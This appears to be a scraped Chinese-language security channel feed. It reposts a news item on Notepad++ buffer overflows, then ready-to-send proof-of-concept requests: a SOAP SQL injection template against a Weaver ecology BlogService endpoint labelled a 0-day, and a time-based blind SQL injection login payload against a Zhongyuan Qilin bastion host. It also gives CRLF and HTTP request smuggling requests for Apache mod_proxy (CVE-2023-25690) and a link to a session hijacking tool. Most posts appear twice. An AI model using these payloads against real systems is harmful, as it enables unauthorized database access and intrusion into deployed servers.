Notepad++ 漏洞允许执行任意代码
流行的开源代码编辑器 Notepad++ 发现了多个缓冲溢出漏洞,允许攻击者执行任意代码。Notepad++ 尚未发布补丁修复漏洞。GitHub Security Lab 的安全研究员 Jaroslav Lobačevski 发现,Notepad++ 使用的部分函数和库存在堆缓冲区写溢出和堆缓冲区读取溢出漏洞,这些漏洞的风险评分从 5.5(中危)到 7.8(高危)不等。他是在四月底报告了漏洞,但直到 Notepad++ 发布最新版本 v8.5.6 漏洞仍然没有修复,因此根据披露政策公开了漏洞和 PoC。
https://cybersecuritynews.com/multiple-notepad-flaw/
https://securitylab.github.com/advisories/GHSL-2023-092_Notepad__/#resources
#安全
流行的开源代码编辑器 Notepad++ 发现了多个缓冲溢出漏洞,允许攻击者执行任意代码。Notepad++ 尚未发布补丁修复漏洞。GitHub Security Lab 的安全研究员 Jaroslav Lobačevski 发现,Notepad++ 使用的部分函数和库存在堆缓冲区写溢出和堆缓冲区读取溢出漏洞,这些漏洞的风险评分从 5.5(中危)到 7.8(高危)不等。他是在四月底报告了漏洞,但直到 Notepad++ 发布最新版本 v8.5.6 漏洞仍然没有修复,因此根据披露政策公开了漏洞和 PoC。
https://cybersecuritynews.com/multiple-notepad-flaw/
https://securitylab.github.com/advisories/GHSL-2023-092_Notepad__/#resources
#安全
www.solidot.org
奇客Solidot | Notepad++ 漏洞允许执行任意代码
Solidot是至顶网的科技资讯网站,主要面对开源自由软件和关心科技资讯读者群,包括众多中国开源软件的开发者,爱好者和布道者。口号是“奇客的知识,重要的东西”。
❤5👍2
ecology某接口 sql注入 0day poc
POST /services/BlogService HTTP/1.1
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.blog.weaver.com.cn">
<soapenv:Header/>
<soapenv:Body>
<web:writeBlogReadFlag>
<web:string>1</web:string>
<web:string>注入点</web:string>
<web:string></web:string>
</web:writeBlogReadFlag>
</soapenv:Body>
</soapenv:Envelope>
POST /services/BlogService HTTP/1.1
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:web="webservices.blog.weaver.com.cn">
<soapenv:Header/>
<soapenv:Body>
<web:writeBlogReadFlag>
<web:string>1</web:string>
<web:string>注入点</web:string>
<web:string></web:string>
</web:writeBlogReadFlag>
</soapenv:Body>
</soapenv:Envelope>
👍6❤2
中远麒麟堡垒机存在SQL注入漏洞漏poc
POST /admin.php?controller=admin_commonuser HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 78
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
username=admin' AND (SELECT 6999 FROM (SELECT(SLEEP(5)))ptGN) AND 'AAdm'='AAdm
POST /admin.php?controller=admin_commonuser HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 78
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
username=admin' AND (SELECT 6999 FROM (SELECT(SLEEP(5)))ptGN) AND 'AAdm'='AAdm
❤4👍3
CVE 2023 25690 概念验证 - Apache HTTP Server 版本 2.4.0 - 2.4.55 上的 mod_proxy 易受攻击的配置会导致 HTTP 请求走私漏洞
⚠️ CVE-2023-25690 ( POC )
- Apache HTTP Server mod_proxy
CLRF Injection
GET /categories/1%20HTTP/1.1%0d%0aFoo:%20baarr HTTP/1.1
Host:
Header Injection
GET /categories/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/SMUGGLED HTTP/1.1
Host: 1.1.1.1
GitHub URL : https://github.com/dhmosfunk/CVE-2023-25690-POC
⚠️ CVE-2023-25690 ( POC )
- Apache HTTP Server mod_proxy
CLRF Injection
GET /categories/1%20HTTP/1.1%0d%0aFoo:%20baarr HTTP/1.1
Host:
Header Injection
GET /categories/1%20HTTP/1.1%0d%0aHost:%20localhost%0d%0a%0d%0aGET%20/SMUGGLED HTTP/1.1
Host: 1.1.1.1
GitHub URL : https://github.com/dhmosfunk/CVE-2023-25690-POC
GitHub
GitHub - dhmosfunk/CVE-2023-25690-POC: CVE 2023 25690 Proof of concept - mod_proxy vulnerable configuration on Apache HTTP Server…
CVE 2023 25690 Proof of concept - mod_proxy vulnerable configuration on Apache HTTP Server versions 2.4.0 - 2.4.55 leads to HTTP Request Smuggling vulnerability. - dhmosfunk/CVE-2023-25690-POC
❤8👍3
Session Hijacking Visual Exploitation
会话劫持可视化利用工具
https://github.com/doyensec/Session-Hijacking-Visual-Exploitation
会话劫持可视化利用工具
https://github.com/doyensec/Session-Hijacking-Visual-Exploitation
❤4